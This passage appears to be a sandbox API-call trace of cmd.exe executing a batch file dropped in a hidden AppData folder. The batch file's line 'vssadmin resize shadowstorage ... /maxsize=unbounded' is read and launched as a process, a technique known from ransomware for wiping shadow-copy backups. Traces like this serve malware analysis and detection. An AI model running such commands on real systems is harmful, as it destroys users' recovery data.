lpValue=0x0) returned 1 [0032.320] GetProcessHeap () returned 0x3e0000 [0032.320] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7730 | out: hHeap=0x3e0000) returned 1 [0032.320] GetEnvironmentStringsW () returned 0x3f7690* [0032.320] GetProcessHeap () returned 0x3e0000 [0032.320] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb36) returned 0x3f8408 [0032.320] FreeEnvironmentStringsW (penv=0x3f7690) returned 1 [0032.321] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0034.673] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0034.673] CloseHandle (hObject=0x74) returned 1 [0034.673] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0034.673] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0034.673] GetProcessHeap () returned 0x3e0000 [0034.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8408 | out: hHeap=0x3e0000) returned 1 [0034.673] GetEnvironmentStringsW () returned 0x3f8408* [0034.673] GetProcessHeap () returned 0x3e0000 [0034.673] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0034.673] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0034.673] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0034.673] GetProcessHeap () returned 0x3e0000 [0034.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0034.673] GetEnvironmentStringsW () returned 0x3f8408* [0034.673] GetProcessHeap () returned 0x3e0000 [0034.673] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0034.673] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0034.673] GetProcessHeap () returned 0x3e0000 [0034.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0034.673] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0034.673] _get_osfhandle (_FileHandle=1) returned 0x264 [0034.673] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0034.674] _get_osfhandle (_FileHandle=1) returned 0x264 [0034.674] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0034.674] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0034.674] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0034.674] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0034.674] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0034.675] SetConsoleInputExeNameW () returned 0x1 [0034.675] GetConsoleOutputCP () returned 0x1b5 [0034.675] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0034.675] SetThreadUILanguage (LangId=0x0) returned 0x409 [0034.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.675] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0034.675] _get_osfhandle (_FileHandle=3) returned 0x74 [0034.675] SetFilePointer (in: hFile=0x74, lDistanceToMove=72, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0034.675] GetProcessHeap () returned 0x3e0000 [0034.675] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7610 | out: hHeap=0x3e0000) returned 1 [0034.675] GetProcessHeap () returned 0x3e0000 [0034.675] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f74e0 | out: hHeap=0x3e0000) returned 1 [0034.675] GetProcessHeap () returned 0x3e0000 [0034.675] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f73b8 | out: hHeap=0x3e0000) returned 1 [0034.675] GetProcessHeap () returned 0x3e0000 [0034.675] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8270 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7328 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7110 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7090 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6f60 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e38 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6dc8 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d50 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0034.676] GetProcessHeap () returned 0x3e0000 [0034.676] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0034.676] _get_osfhandle (_FileHandle=3) returned 0x74 [0034.676] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0034.676] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1879, lpOverlapped=0x0) returned 1 [0034.676] SetFilePointer (in: hFile=0x74, lDistanceToMove=137, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0034.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=65, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\n") returned 65 [0034.676] _get_osfhandle (_FileHandle=3) returned 0x74 [0034.676] GetFileType (hFile=0x74) returned 0x1 [0034.676] _get_osfhandle (_FileHandle=3) returned 0x74 [0034.676] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0034.677] GetProcessHeap () returned 0x3e0000 [0034.677] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0034.677] GetProcessHeap () returned 0x3e0000 [0034.677] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0034.677] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0034.677] GetProcessHeap () returned 0x3e0000 [0034.677] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0034.678] GetProcessHeap () returned 0x3e0000 [0034.678] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x78) returned 0x3f0ee0 [0034.678] _tell (_FileHandle=3) returned 137 [0034.678] _close (_FileHandle=3) returned 0 [0034.678] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0034.678] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0034.678] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0034.679] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0034.679] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0034.679] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0034.679] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0034.679] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0034.679] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0034.679] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0034.679] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0034.679] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0034.679] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0034.679] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0034.679] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0034.679] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0034.679] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0034.679] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0034.679] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0034.679] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0034.679] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0034.679] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0034.679] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0034.679] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0034.679] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0034.679] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0034.679] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0034.679] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0034.679] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0034.679] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0034.679] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0034.679] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0034.679] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0034.679] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0034.679] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0034.679] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0034.680] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0034.680] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0034.680] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0034.680] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0034.680] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0034.680] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0034.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0034.680] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0034.680] SetErrorMode (uMode=0x0) returned 0x1 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0034.680] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.680] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0034.680] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0034.680] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0034.680] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0034.680] GetProcessHeap () returned 0x3e0000 [0034.680] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0034.680] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.681] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0034.681] GetLastError () returned 0x2 [0034.681] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0034.681] GetLastError () returned 0x2 [0034.681] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.681] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0034.681] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0034.682] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0034.682] GetLastError () returned 0x2 [0034.682] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0034.682] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0034.682] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0034.682] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0034.682] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.682] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0034.682] GetProcessHeap () returned 0x3e0000 [0034.682] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8a) returned 0x3f7250 [0034.682] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0034.682] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0034.682] SetErrorMode (uMode=0x0) returned 0x1 [0034.682] GetProcessHeap () returned 0x3e0000 [0034.682] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0034.682] GetProcessHeap () returned 0x3e0000 [0034.682] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0034.682] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.683] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0034.683] GetProcessHeap () returned 0x3e0000 [0034.683] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e8 [0034.683] GetProcessHeap () returned 0x3e0000 [0034.683] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7410 [0034.683] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7410, Size=0x122) returned 0x3f7410 [0034.683] GetProcessHeap () returned 0x3e0000 [0034.683] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7410) returned 0x122 [0034.683] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.683] GetProcessHeap () returned 0x3e0000 [0034.683] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7540 [0034.683] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7540, Size=0x76) returned 0x3f7540 [0034.683] GetProcessHeap () returned 0x3e0000 [0034.683] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7540) returned 0x76 [0034.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.683] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0034.683] GetLastError () returned 0x2 [0034.683] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0034.683] GetLastError () returned 0x2 [0034.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0034.684] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0034.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0034.684] GetLastError () returned 0x2 [0034.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0034.684] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0034.684] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0034.684] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0034.684] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.684] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0034.684] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0034.684] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0034.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0034.684] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0034.684] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0034.684] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0034.684] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0034.685] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0034.686] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0034.686] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0034.686] GetProcessHeap () returned 0x3e0000 [0034.686] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0034.686] GetProcessHeap () returned 0x3e0000 [0034.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0034.686] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0034.686] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x958, dwThreadId=0x95c)) returned 1 [0034.690] CloseHandle (hObject=0x74) returned 1 [0034.690] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0034.690] GetProcessHeap () returned 0x3e0000 [0034.690] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0034.690] GetEnvironmentStringsW () returned 0x3f8408* [0034.690] GetProcessHeap () returned 0x3e0000 [0034.690] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0034.690] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0034.690] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0035.205] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0035.205] CloseHandle (hObject=0x78) returned 1 [0035.205] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0035.205] 